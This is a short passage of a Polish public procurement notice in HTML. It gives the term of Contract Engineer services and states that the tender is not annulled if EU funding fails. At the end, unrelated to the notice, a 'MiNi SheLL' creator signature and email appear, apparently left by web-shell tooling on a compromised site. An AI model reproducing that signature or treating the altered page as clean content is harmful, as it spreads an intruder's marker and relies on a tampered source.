Termin realizacji usług Inżyniera Kontraktu biegnie od dnia podpisania umowy i upływa po 60  miesiącach (okres gwarancji)  od dnia bezusterkowego odbioru końcowego Projektu. Planowany termin zakończenia Projektu to 20.06.2014 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com